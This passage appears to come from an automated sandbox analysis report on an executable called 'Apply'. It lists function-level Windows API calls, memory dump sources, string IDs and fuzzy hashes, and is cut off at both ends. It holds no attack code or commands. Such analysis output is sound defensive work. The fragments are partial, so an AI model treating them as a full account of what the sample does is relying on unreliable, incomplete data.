                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008E6225,?,?,000000FF,00000000,?,000000FF,?), ref: 008E3580
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008E359F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: e4717beeb3820a9acb3cf8d001d3514a48b8fabff32b724d5e4d0c7a4168487e
                                                    • Instruction ID: 6f494e30b144ff43abedab71183883502d4b7c7fb0f0205824659e0cbcec5053
                                                    • Opcode Fuzzy Hash: e4717beeb3820a9acb3cf8d001d3514a48b8fabff32b724d5e4d0c7a4168487e
                                                    • Instruction Fuzzy Hash: B6317672201294BFEB218F558C8AFEB3BA9FF4A711F044065FE08DE291D6759D41CBA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: 6a4649d762ec690009cdeed0a7e817cbf6286e96aad11464fecaaf5f02fd176f
                                                    • Instruction ID: 4a772fd65627000dc542eb18789459dc363423f6a8bed43b2b1ca50a5fbed48e
                                                    • Opcode Fuzzy Hash: 6a4649d762ec690009cdeed0a7e817cbf6286e96aad11464fecaaf5f02fd176f
                                                    • Instruction Fuzzy Hash: 15D18D71A0061AAFDB10DF68C881AAEB7B5FF48314F14866BE915EB381E770ED45CB50
                                                    APIs
                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0089191E
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 008919A1
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00891B4B,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00891A34
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00891A4B
                                                      • Part of subcall function 00883B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00891B4B,00000000,00000000,?,00000000,?,?,?,?), ref: 00891AC7
                                                    • __freea.LIBCMT ref: 00891AF2
                                                    • __freea.LIBCMT ref: 00891AFE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                    • String ID:
                                                    • API String ID: 2829977744-0
                                                    • Opcode ID: bba68b8fc1c9024022d184409d11d1bdcd33c4083b9056e348bb846331190980
                                                    • Instruction ID: 80dbb933fc00a66e1a4cb6276bb68d13fe5fe19f8b064f55d221a736fe5ee081
                                                    • Opcode Fuzzy Hash: bba68b8fc1c9024022d184409d11d1bdcd33c4083b9056e348bb846331190980
                                                    • Instruction Fuzzy Hash: 6D91B272E0921B9EDF21AA64C899AEEBBE5FF09714F5C0129E805E7240D724DD40C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2610073882-625585964
                                                    • Opcode ID: a4dbc920ac36783716c1532cd490fab212d35857ab587e49993e43f5d335c12a
                                                    • Instruction ID: d6e99016f02e1c3f8c6f8277ad7c3945a00f6975fc3d2d56719db19dbcac5e05
                                                    • Opcode Fuzzy Hash: a4dbc920ac36783716c1532cd490fab212d35857ab587e49993e43f5d335c12a
                                                    • Instruction Fuzzy Hash: 45918371A00219ABDF20CFA4C884FAE7BB8FF45728F10865AF515EB280D7709945CF60
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: b7b0f215447ae1700e62ac66eced45156e21d74c1e2ed53a3b21704e8b6b3b94
                                                    • Instruction ID: 4361f0d19cd616c37d1825d78a7c413a4e18090ad4ce556c9e6480a2181dde9b
                                                    • Opcode Fuzzy Hash: b7b0f215447ae1700e62ac66eced45156e21d74c1e2ed53a3b21704e8b6b3b94
                                                    • Instruction Fuzzy Hash: F2913571D00219AFCB10CFA9CC84AEEBBB9FF49320F158159E555FB291D778A941CB60
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 008C1945
                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 008C196D
                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008C1991
                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C19C1
                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C1A48
                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C1AAD
                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008C1B19
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                    • String ID:
                                                    • API String ID: 2550207440-0
                                                    • Opcode ID: d7b6d4d821afa242490dd7417580c4eea0b63ef6fc7ffbf204a15e8e34cbb69e
                                                    • Instruction ID: acb645475b2c2fc991a0f9959d07e35fdff28e93d831e94065599b6ca9b55057
                                                    • Opcode Fuzzy Hash: d7b6d4d821afa242490dd7417580c4eea0b63ef6fc7ffbf204a15e8e34cbb69e
                                                    • Instruction Fuzzy Hash: EA91AC75A002199FDF019F98D8C8FAEBBB4FF06725F144019E901EB292E774E945CB91
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 008D40F2
                                                    • CharUpperBuffW.USER32(?,?), ref: 008D4201
                                                    • _wcslen.LIBCMT ref: 008D4211
                                                    • VariantClear.OLEAUT32(?), ref: 008D43A6
                                                      • Part of subcall function 008C13C8: VariantInit.OLEAUT32(00000000), ref: 008C1408
                                                      • Part of subcall function 008C13C8: VariantCopy.OLEAUT32(?,?), ref: 008C1411
                                                      • Part of subcall function 008C13C8: VariantClear.OLEAUT32(?), ref: 008C141D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4137639002-1221869570
                                                    • Opcode ID: 618ebea2458941f645a4f0d22b599e9e6de600329843e1f2feaa59818ae6039a
                                                    • Instruction ID: e1218cddb979f1e93b52c501cab34d32d57b0b8dc1e3368b119b8afa726a3d61
                                                    • Opcode Fuzzy Hash: 618ebea2458941f645a4f0d22b599e9e6de600329843e1f2feaa59818ae6039a
                                                    • Instruction Fuzzy Hash: 0E9113746083059FCB04DF28C48196AB7E5FB89714F148A2EF89ADB351DB31ED49CB92
                                                    APIs
                                                      • Part of subcall function 008B0695: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?,?,008B09E5), ref: 008B06B2
                                                      • Part of subcall function 008B0695: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06CD
                                                      • Part of subcall function 008B0695: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?,?), ref: 008B06DB
                                                      • Part of subcall function 008B0695: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008B05C8,80070057,?), ref: 008B06EB
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 008D53D8
                                                    • _wcslen.LIBCMT ref: 008D54E0
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 008D5556
                                                    • CoTaskMemFree.OLE32(?), ref: 008D5561
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 614568839-2785691316
                                                    • Opcode ID: 5d1314799af3d3d9daf93ac92ada7cad2cf4f62fbef57f357d4a980948701f03
                                                    • Instruction ID: 67d5cc532a1f9d0904270ada50905c2ebe4fb4b4f121dd42eaf2844393e24ef1
                                                    • Opcode Fuzzy Hash: 5d1314799af3d3d9daf93ac92ada7cad2cf4f62fbef57f357d4a980948701f03
                                                    • Instruction Fuzzy Hash: 5E910671D002199FDF15DFA8D881AEEB7B9FF08314F10866AE915AB251DB309A488F61
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 008E293E
                                                    • GetMenuItemCount.USER32(00000000), ref: 008E2970
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008E2998
                                                    • _wcslen.LIBCMT ref: 008E29CE
                                                    • GetMenuItemID.USER32(?,?), ref: 008E2A08
                                                    • GetSubMenu.USER32(?,?), ref: 008E2A16
                                                      • Part of subcall function 008B4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B4142
                                                      • Part of subcall function 008B4128: GetCurrentThreadId.KERNEL32 ref: 008B4149
                                                      • Part of subcall function 008B4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008B2C95), ref: 008B4150
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008E2A9E
                                                      • Part of subcall function 008BEFBC: Sleep.KERNEL32 ref: 008BF034
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 4196846111-0
                                                    • Opcode ID: cf54c0dc2a5aa5974f4934fd8882e770af9ab60f43d0a081eff83b67bdaf8417
                                                    • Instruction ID: f0f6d4ee56980efbdd2f4e2216ec5463ad5155168791b0ff820487a0d9f0b0be
                                                    • Opcode Fuzzy Hash: cf54c0dc2a5aa5974f4934fd8882e770af9ab60f43d0a081eff83b67bdaf8417
                                                    • Instruction Fuzzy Hash: 4471AF35A00259AFCB10EF69C881AAEBBF5FF49314F148469E816EB351DB34ED41CB91
                                                    APIs
                                                    • IsWindow.USER32(01589248), ref: 008E8623
                                                    • IsWindowEnabled.USER32(01589248), ref: 008E862F
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 008E870A
                                                    • SendMessageW.USER32(01589248,000000B0,?,?), ref: 008E873D
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 008E8775
                                                    • GetWindowLongW.USER32(01589248,000000EC), ref: 008E8797
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008E87AF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 9847be4143963670f84be52cbe4b9cf9932109a6cadd344e1dc6f662079ae76f
                                                    • Instruction ID: bb95d885e66151bb86d4e97a6812a3ecc074491d7e22806ca100d087f046fa72
                                                    • Opcode Fuzzy Hash: 9847be4143963670f84be52cbe4b9cf9932109a6cadd344e1dc6f662079ae76f
                                                    • Instruction Fuzzy Hash: 17714874605284EFEF219F66CC98FAE7BA9FF5A310F140059E849D72A1CB31AD84DB11
                                                    APIs
                                                    • GetParent.USER32(?), ref: 008BB5FA
                                                    • GetKeyboardState.USER32(?), ref: 008BB60F
                                                    • SetKeyboardState.USER32(?), ref: 008BB670
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 008BB69E
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 008BB6BD
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 008BB6FE
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008BB721
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 3bba52f948ebddf49f7f1282fdc22ad2fb2f92714e5983992c41c755d01d3b9e
                                                    • Instruction ID: 5419a4cab9493e18c2485172a9e85082b42edfa3ac7e7285916690ab11c8e4ff
                                                    • Opcode Fuzzy Hash: 3bba52f948ebddf49f7f1282fdc22ad2fb2f92714e5983992c41c755d01d3b9e
                                                    • Instruction Fuzzy Hash: D851E2A09047D53EFB364228CC45BFABFA9BB06304F088489E1D5C55D2D7D8EC84D751
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 008BB41A
                                                    • GetKeyboardState.USER32(?), ref: 008BB42F
                                                    • SetKeyboardState.USER32(?), ref: 008BB490
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008BB4BC
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008BB4D9
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008BB518
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008BB539
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: c99a490b172d5153496455e72678467eacee30af757983639a435462f85f77a6
                                                    • Instruction ID: 5f00463f52e92e9fb5eb60d70a1ac1183b5bcef743920ed5f808c252855b17b7
                                                    • Opcode Fuzzy Hash: c99a490b172d5153496455e72678467eacee30af757983639a435462f85f77a6
                                                    • Instruction Fuzzy Hash: 1C51D1A09047D57DFB3282248C55BFABEA9FB05300F088489E1D5DAAD3D3D4EC88D755
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00894667,?,?,?,?,?,?,?,?,00885EF3,?,?,00894667,?,?), ref: 008857C0
                                                    • __fassign.LIBCMT ref: 0088583B
                                                    • __fassign.LIBCMT ref: 00885856
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00894667,00000005,00000000,00000000), ref: 0088587C
                                                    • WriteFile.KERNEL32(?,00894667,00000000,00885EF3,00000000,?,?,?,?,?,?,?,?,?,00885EF3,?), ref: 0088589B
                                                    • WriteFile.KERNEL32(?,?,00000001,00885EF3,00000000,?,?,?,?,?,?,?,?,?,00885EF3,?), ref: 008858D4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: d1862239fe01c6947b7012ce3ba85c99e9fb62acb0d5b2cc879f5118fe5e710d
                                                    • Instruction ID: 4c13541b016b06a4b84b05fbda75b5004e973a32e29d9ee3695789492dca3c90
                                                    • Opcode Fuzzy Hash: d1862239fe01c6947b7012ce3ba85c99e9fb62acb0d5b2cc879f5118fe5e710d
                                                    • Instruction Fuzzy Hash: A351AF71A106499FDB10DFA8DC85AEEBBF8FF09310F14412BE955E7291E730AA41CB61
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 0087309B
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 008730A3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00873131
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0087315C
                                                    • _ValidateLocalCookies.LIBCMT ref: 008731B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: fe13af6adca9143fe578969e652633b157d90d42297a27a88ba58c56c12f12f4
                                                    • Instruction ID: 6b21e32c681a13f24e5d9bbf73bd9794092911f6df246780de421c3c3b96417b
                                                    • Opcode Fuzzy Hash: fe13af6adca9143fe578969e652633b157d90d42297a27a88ba58c56c12f12f4
                                                    • Instruction Fuzzy Hash: B9418F34A00219ABCF10DF69C885AAEBBA5FF44324F14C155E81DEB25AD731DB41DBA3
                                                    APIs
                                                      • Part of subcall function 008D37D5: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008D3801
                                                      • Part of subcall function 008D37D5: _wcslen.LIBCMT ref: 008D3822
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008D1899
                                                    • WSAGetLastError.WSOCK32 ref: 008D18A8
                                                    • WSAGetLastError.WSOCK32 ref: 008D1950
                                                    • closesocket.WSOCK32(00000000), ref: 008D1980
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 2675159561-0
                                                    • Opcode ID: 82c660f230a744d357c7e28d61f47dee68451a97375d3394c52cb72dcca45e84
                                                    • Instruction ID: edcb9a72cf141d15982e5bffc586fb26ee07cea84b9e820e9ae56b09cd8958ae
                                                    • Opcode Fuzzy Hash: 82c660f230a744d357c7e28d61f47dee68451a97375d3394c52cb72dcca45e84
                                                    • Instruction Fuzzy Hash: A341AE31600218BFDB109F28C899BA9BBA9FF45364F14816AFC45DF391D770AD85CBA1
                                                    APIs
                                                      • Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008BD507,?), ref: 008BE43E
                                                      • Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008BD507,?), ref: 008BE457
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 008BD52A
                                                    • MoveFileW.KERNEL32(?,?), ref: 008BD564
